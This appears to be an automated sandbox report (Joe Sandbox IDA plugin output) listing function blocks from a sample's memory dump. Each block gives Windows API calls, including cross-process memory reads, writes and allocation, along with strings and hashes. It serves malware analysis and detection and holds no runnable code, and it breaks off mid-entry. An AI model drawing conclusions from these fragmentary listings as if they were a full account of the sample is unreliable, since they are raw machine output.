                                              • Opcode ID: 84fe508c0667cc3ae73586ce5418b951bb6609e0a458edb6fc82feafe8c18461
                                              • Instruction ID: 005f952bf43f0b5c5cbab1ec41c8ffed27efc1bf32a3cea061dd84258abc0d89
                                              • Opcode Fuzzy Hash: 84fe508c0667cc3ae73586ce5418b951bb6609e0a458edb6fc82feafe8c18461
                                              • Instruction Fuzzy Hash: 2A215E71924255AFCB149F398C48EBA37E8EB45724F204669F925D71E0DBB09810DB90
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B89ED8
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B89F0A
                                              • __itow.LIBCMT ref: 00B89F22
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B89F4A
                                              • __itow.LIBCMT ref: 00B89F5B
                                              Similarity
                                              • API ID: MessageSend$__itow$_memmove
                                              • String ID:
                                              • API String ID: 2983881199-0
                                              • Opcode ID: 7923eae403107cb3c8449aa291ce236fe1cd7399c89727240ef7e582042ba9a6
                                              • Instruction ID: fda17b78c021a51fa9e39997c644bce5f618d6a883fd8f4d10e4e1b077cb74f2
                                              • Opcode Fuzzy Hash: 7923eae403107cb3c8449aa291ce236fe1cd7399c89727240ef7e582042ba9a6
                                              • Instruction Fuzzy Hash: DB21B331A04204BBDF14BAA48C8AEBE7BECEB89751F0840A5FE01E7251DA70D945D7E1
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 00BA6159
                                              • GetForegroundWindow.USER32 ref: 00BA6170
                                              • GetDC.USER32(00000000), ref: 00BA61AC
                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00BA61B8
                                              • ReleaseDC.USER32(00000000,00000003), ref: 00BA61F3
                                              Similarity
                                              • API ID: Window$ForegroundPixelRelease
                                              • String ID:
                                              • API String ID: 4156661090-0
                                              • Opcode ID: bf0812b6a364395dd4743e2d5dba52b4692a032aad572e48d781a3b58b82b093
                                              • Instruction ID: 50a86286a36b508f859f181691fca881d479d7f26f075a9b40cbaf95732a1f6a
                                              • Opcode Fuzzy Hash: bf0812b6a364395dd4743e2d5dba52b4692a032aad572e48d781a3b58b82b093
                                              • Instruction Fuzzy Hash: 78216F75A10204EFD714EF65DD84A9ABBF9EF89311F1484B9E94A97352CA70AC00CB90
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B31729
                                              • SelectObject.GDI32(?,00000000), ref: 00B31738
                                              • BeginPath.GDI32(?), ref: 00B3174F
                                              • SelectObject.GDI32(?,00000000), ref: 00B31778
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: 102a3002d04e8f02154baa890a5ba4462a901cda11e80b41fe7cd2ede9061f27
                                              • Instruction ID: 32d6c264f12dc1b324581637f1e81a75e242d7bea9ed554342a71d3231d4fce9
                                              • Opcode Fuzzy Hash: 102a3002d04e8f02154baa890a5ba4462a901cda11e80b41fe7cd2ede9061f27
                                              • Instruction Fuzzy Hash: 4621AC70814208EBDB10DF6ADD49B797BE8FB003A1F2846D6F815971A0DF709CA2CB90
                                              APIs
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 4a759c97bf9bdbd5dee7100285f2664a8eb6c2e94e06dab824a4f33d7da4620a
                                              • Instruction ID: 8ddbe0966b27c248a6df48f56be3c8471a6a591494d2cb4f2515603eef5c7fe4
                                              • Opcode Fuzzy Hash: 4a759c97bf9bdbd5dee7100285f2664a8eb6c2e94e06dab824a4f33d7da4620a
                                              • Instruction Fuzzy Hash: 6401D2A2A802053BD20072149C82FBB6BDCDA20784F04C0E9FE0696652F770EE14C3F1
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00B95075
                                              • __beginthreadex.LIBCMT ref: 00B95093
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00B950A8
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B950BE
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B950C5
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                              • String ID:
                                              • API String ID: 3824534824-0
                                              • Opcode ID: fa460e279401901e2f2b7dfa047b98b82cbc1c811e977538c020257957ec6008
                                              • Instruction ID: 824213ffec1a02087ccd5f0220dc28f6dfeee4421c6f52b9151aa7afd85cb956
                                              • Opcode Fuzzy Hash: fa460e279401901e2f2b7dfa047b98b82cbc1c811e977538c020257957ec6008
                                              • Instruction Fuzzy Hash: 3B11E572908748ABCB119BA89C04AAF7BACEB49320F1442AAF814D3360DA71894487F0
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B88E3C
                                              • GetLastError.KERNEL32(?,00B88900,?,?,?), ref: 00B88E46
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00B88900,?,?,?), ref: 00B88E55
                                              • HeapAlloc.KERNEL32(00000000,?,00B88900,?,?,?), ref: 00B88E5C
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B88E73
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 842720411-0
                                              • Opcode ID: 67339bdb0477023da810717587712d27901eb65203d4975af0da8d858b2b6f24
                                              • Instruction ID: d5d780a684c00a601667811b047edd60aec93eb80ebe177011bf1140aad7be1b
                                              • Opcode Fuzzy Hash: 67339bdb0477023da810717587712d27901eb65203d4975af0da8d858b2b6f24
                                              • Instruction Fuzzy Hash: 99016D70210204FFDB206FA6EC48D6B7BADEF89355B540569F949C3220DE319C11DB60
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B9581B
                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B95829
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B95831
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B9583B
                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B95877
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: 53fae64ef4a1d8015af62138e3f35fe1795b8375659433de707ef4f4cdd2b513
                                              • Instruction ID: 214ef087890ab7cba2359bab3623aafd5367ebb44bbbd1a4f82b5c75959d64a2
                                              • Opcode Fuzzy Hash: 53fae64ef4a1d8015af62138e3f35fe1795b8375659433de707ef4f4cdd2b513
                                              • Instruction Fuzzy Hash: 76015771C41A1DDBCF20AFE9E8889EDBBB8FB0C711F0141A6E501B2150DF309550CBA1
                                              APIs
                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?,?,00B88073), ref: 00B87D45
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?), ref: 00B87D60
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?), ref: 00B87D6E
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?), ref: 00B87D7E
                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?), ref: 00B87D8A
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: 15d7778e367b28a78e28fa2e457f628bc3f1ac9c990441e58529edf0d4a5efe2
                                              • Instruction ID: 3a0c9164049389a7eb1b34b9323e46a7fc351b0307b83be4f67d5cb65a0e61ae
                                              • Opcode Fuzzy Hash: 15d7778e367b28a78e28fa2e457f628bc3f1ac9c990441e58529edf0d4a5efe2
                                              • Instruction Fuzzy Hash: A0015AB2615215EBDB116F54DC44BAABBEDEF88796F248064F908D7220DB71ED40CBA0
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B88CDE
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B88CE8
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B88CF7
                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B88CFE
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B88D14
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: baf7725066c478bd848ec20159d2b390384d419391e147b8f348e23124d60bc0
                                              • Instruction ID: d5a8077290c9415da30edd649258c6581f36d0fa7dfe2018f47d36fc8ee49ded
                                              • Opcode Fuzzy Hash: baf7725066c478bd848ec20159d2b390384d419391e147b8f348e23124d60bc0
                                              • Instruction Fuzzy Hash: C9F0A934210209BFEB112FA59C88E6B3BACFF8D754F504029FA04C71A0CF60AC01DB60
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B88D3F
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D49
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D58
                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D5F
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D75
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: d98ac74fc4065704e78fa45ab28d4b77b48c6a61e084b127d23cae7996343741
                                              • Instruction ID: a1ed7c6d528db72edc6c74fe244f0eabc015003c358f4bb9174cda2a653dadc3
                                              • Opcode Fuzzy Hash: d98ac74fc4065704e78fa45ab28d4b77b48c6a61e084b127d23cae7996343741
                                              • Instruction Fuzzy Hash: CDF0AF30250204EFEB112FA9EC88F673BACEF89755F440529F944C31A0CF609D01DB60
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 00B8CD90
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B8CDA7
                                              • MessageBeep.USER32(00000000), ref: 00B8CDBF
                                              • KillTimer.USER32(?,0000040A), ref: 00B8CDDB
                                              • EndDialog.USER32(?,00000001), ref: 00B8CDF5
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: 7c2f9fbdcca6b7e068685a1000312f98a33000065612c5d610190cd298fade0e
                                              • Instruction ID: da7978f56dc6cd19cd7ed7f3664f84f31667e9fa7bc91368b7ec22ca171a6c6b
                                              • Opcode Fuzzy Hash: 7c2f9fbdcca6b7e068685a1000312f98a33000065612c5d610190cd298fade0e
                                              • Instruction Fuzzy Hash: C5016270510704ABEB217F64DD8EFA67FB8FB04705F0006B9A582A21E1DBF0A954CB90
                                              APIs
                                              • EndPath.GDI32(?), ref: 00B3179B
                                              • StrokeAndFillPath.GDI32(?,?,00B6BBC9,00000000,?), ref: 00B317B7
                                              • SelectObject.GDI32(?,00000000), ref: 00B317CA
                                              • DeleteObject.GDI32 ref: 00B317DD
                                              • StrokePath.GDI32(?), ref: 00B317F8
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 1662b1269e4b59a45a3ea323686775b36838c7efc05a053b1f8dedc42625e477
                                              • Instruction ID: c67b4f990130914dae5395144fecb391fe8d5d62c898f76a65c5e6ec332b242b
                                              • Opcode Fuzzy Hash: 1662b1269e4b59a45a3ea323686775b36838c7efc05a053b1f8dedc42625e477
                                              • Instruction Fuzzy Hash: A7F0EC70058208EBDB11AF2AEC4CB693FA8E7043A6F188294F469571F0CF314DA5DF11
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00B9CA75
                                              • CoCreateInstance.OLE32(00BC3D3C,00000000,00000001,00BC3BAC,?), ref: 00B9CA8D
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • CoUninitialize.OLE32 ref: 00B9CCFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                              • String ID: .lnk
                                              • API String ID: 2683427295-24824748
                                              • Opcode ID: 93b4d801d1dc06f9b6becb475238ba249b319396d19d66087b29fae28ee2b97a
                                              • Instruction ID: fd0360bbbee5be70269d3596c056737d5a8bb69f0290ca8282b5ae65440f30a3
                                              • Opcode Fuzzy Hash: 93b4d801d1dc06f9b6becb475238ba249b319396d19d66087b29fae28ee2b97a
                                              • Instruction Fuzzy Hash: 4DA13B71504205AFD300EF64DC81EABB7E8EF95718F1049ACF155972A2EB70EE49CB92
                                              APIs
                                                • Part of subcall function 00B50FE6: std::exception::exception.LIBCMT ref: 00B5101C
                                                • Part of subcall function 00B50FE6: __CxxThrowException@8.LIBCMT ref: 00B51031
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B41680: _memmove.LIBCMT ref: 00B416DB
                                              • __swprintf.LIBCMT ref: 00B3E598
                                              Strings
                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B3E431
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                              • API String ID: 1943609520-557222456
                                              • Opcode ID: 2d3e7eab5811d151f70df54333fd20f2c954fbb0f4e5d48c01421161ac840d1e
                                              • Instruction ID: 3e60d773292845e35746e17270c670c98cd62ef0315302b67b988ca82e822347
                                              • Opcode Fuzzy Hash: 2d3e7eab5811d151f70df54333fd20f2c954fbb0f4e5d48c01421161ac840d1e
                                              • Instruction Fuzzy Hash: 44919F715083019FC724EF28C885D6EB7E8EF95700F11499EF896972A1EB70EE44DB52
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00B552CD
                                                • Part of subcall function 00B60320: __87except.LIBCMT ref: 00B6035B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: 2968d3799c02e5c76d087b9ac74186965eda7bcd6c8dc42b52c829697836ed04
                                              • Instruction ID: 375d20a16a18864dee2c9f14c98b83839ac4ed5da3811f396d01f72addb45637
                                              • Opcode Fuzzy Hash: 2968d3799c02e5c76d087b9ac74186965eda7bcd6c8dc42b52c829697836ed04
                                              • Instruction Fuzzy Hash: AB516D6192960587CB317716C9A137B2BE4DB00753F2049D8E9C6473A9EF7D8CC8DB46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #$+
                                              • API String ID: 0-2552117581
                                              • Opcode ID: 08d6c48a056a54e605bbe7af3220791c02336e0aa7777b0712532047657875d6
                                              • Instruction ID: 9bd3f562d754735b6d9b17e34517976dc25f499eeda4d8500c945d4c30e17a38
                                              • Opcode Fuzzy Hash: 08d6c48a056a54e605bbe7af3220791c02336e0aa7777b0712532047657875d6
                                              • Instruction Fuzzy Hash: D251F275900256CFDB25FF68C880AFA7BE4EF59310F1440D6EC95AB2A0D734AD86CB61
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memset$_memmove
                                              • String ID: ERCP
                                              • API String ID: 2532777613-1384759551
                                              • Opcode ID: ef5e5fb22caccd4e35ed3cbeb8d0d87810211f35218ae18fa2ccb742b3873006
                                              • Instruction ID: 1df856fc6be60797288cbd5e49c1e399433a51fdb7bdc52e612897f01bf51a79
                                              • Opcode Fuzzy Hash: ef5e5fb22caccd4e35ed3cbeb8d0d87810211f35218ae18fa2ccb742b3873006
                                              • Instruction Fuzzy Hash: 8A51D4719013099BCB24DF65C8917AABBF8EF04314F1485EEE88ADB251E730D686CB40
                                              APIs
                                                • Part of subcall function 00B91CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B89E4E,?,?,00000034,00000800,?,00000034), ref: 00B91CE5
                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B8A3F7
                                                • Part of subcall function 00B91C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B89E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00B91CB0
                                                • Part of subcall function 00B91BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00B91C08
                                                • Part of subcall function 00B91BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B89E12,00000034,?,?,00001004,00000000,00000000), ref: 00B91C18
                                                • Part of subcall function 00B91BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B89E12,00000034,?,?,00001004,00000000,00000000), ref: 00B91C2E
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B8A464
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B8A4B1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: ac650012c4245bcac8e915e54073761b38da75e85f311ba079a12505f27c6dc5
                                              • Instruction ID: 360eae0c9bcfc51ae819631e3c997e4574e21f3910d80879a4246224569892c6
                                              • Opcode Fuzzy Hash: ac650012c4245bcac8e915e54073761b38da75e85f311ba079a12505f27c6dc5
                                              • Instruction Fuzzy Hash: B7416C7294121DBFDF10EFA4CC85ADEB7B8EB09300F0440A5FA45B7290DA706E85DBA1
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BB7A86
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BB7A9A
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BB7ABE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              • Opcode ID: 3a4aaa7340a582610912ec48785a7309a7e16483cbc1a7b63d35eabe19241ac7
                                              • Instruction ID: 54e26a9e01926234160d522646e76e15e6a0a56c5f5cdd68d4d24ea86d9a055f
                                              • Opcode Fuzzy Hash: 3a4aaa7340a582610912ec48785a7309a7e16483cbc1a7b63d35eabe19241ac7
                                              • Instruction Fuzzy Hash: 43219F32654218ABDF259F54CC82FEE3BA9EB88724F110254FE156B190DAB1AC51CBA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BB826F
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BB827D
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BB8284
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              • Opcode ID: 40f75abaa956dd820495d05eece348a9fb84b0d9ede23052d16d5efb002178d6
                                              • Instruction ID: eebb1f0367dabc386a0773d2f2a44c09d41bcd9cffe3a18a229f496af94c50fc
                                              • Opcode Fuzzy Hash: 40f75abaa956dd820495d05eece348a9fb84b0d9ede23052d16d5efb002178d6
                                              • Instruction Fuzzy Hash: 0C2139B5604209AFDB10DF58DC85DB637EDEF5A3A4B140199FA019B2A1CFB1EC51CBA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BB7360
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BB7370
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BB7395
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: 4f52670f44e28e7c544086c861158f6389077b2ddc82c188711a0ab1789582e8
                                              • Instruction ID: 5ec8d7df1d108dd9a9a159c5a2e3f1193e3bc6adf82e1371ce76c3f37b25db0c
                                              • Opcode Fuzzy Hash: 4f52670f44e28e7c544086c861158f6389077b2ddc82c188711a0ab1789582e8
                                              • Instruction Fuzzy Hash: C821C232654118BFDF158F54CC85FFF3BEAEB89754F118164F9009B190CAB1AC529BA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BB7D97
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BB7DAC
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BB7DB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: 4840eea8ff13284b1411bdf2a49fa2ee3707717ea71be261e91f87450f9473a4
                                              • Instruction ID: 115bf3ebca32cfc6faf7263936a111c58c8b13db216f87a14b9a28056dee57ca
                                              • Opcode Fuzzy Hash: 4840eea8ff13284b1411bdf2a49fa2ee3707717ea71be261e91f87450f9473a4
